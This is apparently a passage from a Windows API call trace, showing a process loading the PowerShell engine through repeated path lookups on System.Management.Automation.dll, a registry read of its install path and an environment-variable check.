	[0418.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.100] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d878 | out: phkResult=0x20d878*=0x364) returned 0x0
	[0418.100] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d7fc, lpData=0x0, lpcbData=0x20d7f8*=0x0 | out: lpType=0x20d7fc*=0x1, lpData=0x0, lpcbData=0x20d7f8*=0x56) returned 0x0
	[0418.100] CoTaskMemAlloc (cb=0x5a) returned 0x1b919fa0
	[0418.101] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d7cc, lpData=0x1b919fa0, lpcbData=0x20d7c8*=0x56 | out: lpType=0x20d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d7c8*=0x56) returned 0x0
	[0418.101] CoTaskMemFree (pv=0x1b919fa0) 
	[0418.101] RegCloseKey (hKey=0x364) returned 0x0
	[0418.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.104] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.104] CoTaskMemFree (pv=0x1b91c710) 
	[0418.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
